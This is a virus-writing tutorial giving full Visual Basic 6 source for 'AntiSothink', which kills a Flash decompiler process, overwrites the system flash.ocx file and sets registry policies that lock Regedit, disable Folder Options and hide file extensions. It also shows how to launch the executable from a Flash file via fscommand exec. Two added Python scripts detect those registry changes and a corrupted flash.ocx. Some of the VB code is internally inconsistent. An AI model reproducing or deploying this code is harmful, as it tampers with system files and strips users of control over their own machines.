
Virus Tutorial – Kick Sothink (Flash Ship-Breaker) Using VB

Software : AntiSothink
Build : VB 6.0

Clearly, making a virus does not have to be categorized as mischief; it can also be categorized as a good deed. Why? Because by making a virus we can also help Flash designers who create .swf files that get forced open with Sothink.

 

SOTHINK

 

Sothink is a program that is usually used to force open Flash .swf files. So in fact, whoever gets an .swf file automatically gets its source code too. This is a picture of the Sothink program:

 

SOTHINK WEAKNESS

 

Sothink's weakness is that it depends on the Flash .ocx file in the directory c:\windows\system32\Macromed\Flash. If we modify that file a little, Flash still runs, but the Flash (.swf) file can no longer be captured by Sothink. So when Sothink tries to force open that file, it shows a message:

 

ANTISOTHINK

 

To make this Antisothink, first write out the algorithm:

  1. START
  2. Check whether Sothink is running. If it is, shut Sothink down; if not, go on to step 3
  3. Check whether the directory c:\windows\system32\Macromed\Flash contains a Flash .ocx file
  4. If it does, manipulate flash.ocx
  5. FINISH

Now you know the purpose.

 

SOURCE CODE

 

Okay, now we will try to make the code. Follow these steps:

  1. Open VB and create a new project with 1 module
  2. Then type the code below:

‘*************************Code to Open Key on Registry*****************************

Option Explicit

Public Type SECURITY_ATTRIBUTES
nLength As Long
IpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H2006

Public Declare Function RegOpenKeyEx Lib “advapi32.dll” Alias “RegOpenKeyExA” (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long

‘////////////
Public Const REG_OPTION_BACKUP_RESTORE = 4 ‘ open for backup or restore
Public Const REG_OPTION_VOLATILE = 1 ‘ Key is not preserved when system is rebooted
Public Const REG_OPTION_NON_VOLATILE = 0 ‘ Key is preserved when system is rebooted
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const SYNCHRONIZE = &H100000
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)

 

 

‘////////////////////Declaration for Gasak Program//////////////////////////////////////////////////////
Public Declare Function GetForegroundWindow Lib “user32” () As Long
Public Declare Function GetWindowText Lib “user32” Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function CloseWindow Lib “user32” (ByVal hwnd As Long) As Long
Public Declare Function EnableWindow Lib “user32” (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function SendMessage Lib “user32” Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const WM_CLOSE = &H10

‘//////////////////Declaration to Delete Program/////////////////////////////////////////////////////

Public Declare Function DeleteFile Lib “kernel32” Alias “DeleteFileA” (ByVal lpFileName As String) As Long

‘//////////////////Declaration for reading the flash.ocx file//////////////////////////////
Private Sign(4096) As String ‘The Signatures will be loaded into this array
Dim keyinstal As String

Public Sub bacafileflash()

Dim sIn As String
Dim swords() As String
Dim X As Long
Dim Data As String
Dim tik As String
Dim tuk As String

tik = “”””
tuk = ” & _”

keyinstal = ReadKey(“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InstallerLocation”)
sIn = FileText(keyinstal & “\Macromed\Flash\flash.ocx”)
swords = Split(sIn, vbCrLf)
‘ReDim Preserve swords(UBound(swords) – 1)
sIn = “”
For X = LBound(swords) To UBound(swords)
Data = swords(X)
Log tik & Data & tik & tuk
Next X

Exit Sub

err:
MsgBox “error when access file flash.ocx!” & vbCrLf & “maybe it corrupted” & vbCrLf & vbCrLf & “The error message was: ” & err.Description, vbCritical + vbOKOnly, “Error”

End Sub
Public Function FileText(ByVal strfilename As String) As String

Dim handle As Long

handle = FreeFile
Open strfilename For Binary As #handle
FileText = Space$(LOF(handle))
Get #handle, , FileText
Close #handle

End Function

Public Sub CreateKey(Folder As String, Value As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value

End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)

Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “REG_DWORD”

End Sub

Public Sub DeleteKey(Value As String, Folder As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “Reg_Dword”

End Sub

Sub kodepertahanan()
‘******************Hide files that have the hidden attribute*****************************

CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue”, 2
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue”, 2
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 0

‘//////////Disable Folder Options////////////
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
‘//////////Lock Regedit////////////
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
‘////////Hide file extensions//////////
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1

End Sub

Private Function Gasak(Opo As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(Opo)) > 0 Then
‘EnableWindow H, 1
SendMessage H, WM_CLOSE, 0, 0

End If
If InStr(UCase(T), UCase(“”)) > 0 Then
MsgBox “Si GASAK has been Disabled by The Creator!! Cheers!! ;)”, vbInformation, “GASAK is shutting Down”
End
End If
‘Shell “shutdown -a”, vbHide ‘// becomes slow if this is enabled, so just use the other way (API)…
End Function

‘////////////////////////////Program code for deleting /////////////////////////////////////////

Sub Main()

Shell “Taskkill /F /IM SWFDecompiler.exe”, vbHide
bacafileflash

FileCopy App.Path & “\flash.ocx”, keyinstal & “\Macromed\Flash\flash.ocx”
DeleteFile App.Path & “\flash.ocx”
End Sub

‘////////////////////////////Code to read the registry/////////////////////////////////////////
Public Function ReadKey(Value As String) As String

Dim b As Object
Dim r
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
r = b.RegRead(Value)
ReadKey = r
End Function
‘////////////////////////////Code to create the flash.ocx file/////////////////////////////////////////
Public Sub Log(strLog As String)
Dim ff As Integer
ff = FreeFile
On Error Resume Next
Open App.Path & “\flash.ocx” For Append As #ff
Print #ff, strLog
Close #ff
End Sub
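
The registry values that kodepertahanan writes in the listing above can be audited from a registry export. The following Python script is an added example, not part of the original tutorial: it parses .reg export text and reports which of the HKCU values from the listing are set to the same data. The function names and the sample export are constructed for illustration.

```python
import re

# (key, value name) -> DWORD that kodepertahanan in the listing writes
WATCHED = {
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
     r"\Policies\Explorer", "NoFolderOptions"): 1,
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
     r"\Policies\System", "DisableRegistryTools"): 1,
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
     r"\Explorer\Advanced", "HideFileExt"): 1,
}
KEY_RE = re.compile(r"^\[([^\]]+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def parse_reg_dwords(text):
    """Yield (key, name, value) for each DWORD in .reg export text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if m := KEY_RE.match(line):
            key = m.group(1)
        elif key and (m := VAL_RE.match(line)):
            yield key, m.group(1), int(m.group(2), 16)

def find_tampering(text):
    """Return the watched values that are set as in the listing."""
    # Registry key and value names are case-insensitive.
    watched = {(k.lower(), n.lower()): v for (k, n), v in WATCHED.items()}
    return [f"{key}\\{name}={value}"
            for key, name, value in parse_reg_dwords(text)
            if watched.get((key.lower(), name.lower())) == value]

# Constructed sample export, not taken from a real machine.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"disableregistrytools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000000
'''

if __name__ == "__main__":
    for hit in find_tampering(SAMPLE_EXPORT):
        print("set as in the listing:", hit)
```

Exports written by regedit are UTF-16, so read a real file with `encoding="utf-16"`. HideFileExt=1 is also the stock Windows setting, so on its own it is only supporting evidence next to the two Policies values.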

We will not discuss this program in full, only part by part.

The explanations of this program are in fact in the comments; just follow them.

The core of this program is:

‘////////////////////////////Code to make  flash.ocx file/////////////////////////////////////////

Public Sub Log(strLog As String)
– Beginning of Sub Log

Dim ff As Integer
– Variable definition

ff = FreeFile
– Assign a free file number to ff

On Error Resume Next
– Continue with the next statement if an error occurs

Open App.Path & “\flash.ocx” For Append As #ff
– Open the fake flash.ocx file

Print #ff, strLog
– Write to the flash.ocx file

Close #ff
– Close the file

End Sub
– End of Sub
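
Because Sub Log writes the replacement flash.ocx as text lines wrapped in quote characters, the resulting file no longer begins with a PE header, which makes the change easy to spot. The following Python check is an added example, not part of the original tutorial: it classifies a file by its MZ and PE signatures. The function names and both byte samples are constructed for illustration.

```python
import struct

def pe_header_status(data: bytes) -> str:
    """Classify file bytes as 'pe', 'truncated' or 'not-pe'."""
    if len(data) < 0x40:                 # shorter than a DOS header
        return "truncated"
    if data[:2] != b"MZ":                # DOS magic missing
        return "not-pe"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):         # PE offset points past the end
        return "truncated"
    if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
        return "pe"
    return "not-pe"

def make_stub_pe() -> bytes:
    """Constructed DOS header plus PE signature (not a loadable module)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    return bytes(dos) + b"PE\0\0" + bytes(20)

# Constructed sample of the shape Sub Log produces: the original bytes
# wrapped as a quoted text line ending in ' & _' and CRLF.
TAMPERED_SAMPLE = b'"' + make_stub_pe() + b'" & _\r\n'

def check_file(path: str) -> str:
    """Read the start of a file on disk and classify it."""
    with open(path, "rb") as fh:
        return pe_header_status(fh.read(4096))

if __name__ == "__main__":
    print("stub     :", pe_header_status(make_stub_pe()))
    print("tampered :", pe_header_status(TAMPERED_SAMPLE))
```

A header check only shows that the file is still an executable image; comparing its hash or signature against a known-good copy is what confirms it is unmodified.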

 

It is called from Sub bacafileflash; try to work out the explanation of that routine yourself. Now, to run the compiled program, just put the Flash script into the program. To run the Flash script, follow these steps:

  1. Create a new frame
  2. Click Properties
  3. In the frame's action properties there is a Browser/Network section, which is used to call an .exe file
  4. If using Flash MX, the syntax is:

fscommand (“exec”,”file.exe”)

  5. Create a folder named fscommand in the location where the Flash projector is placed.
  6. If using Flash 5, the command is:

fscommand (“exec”,”./foldername/file.exe”)

or

fscommand( “exec”,”foldername/file.exe”)

  7. There is no rule in Flash 5; the important thing is that the path is defined correctly.

The antisothink program and source code can be downloaded from this link:

antisothink program and source code

If you have any questions about this program, just contact:

overlord@virologi.info

 

 

Sincerely yours,

overlord@virologi.info
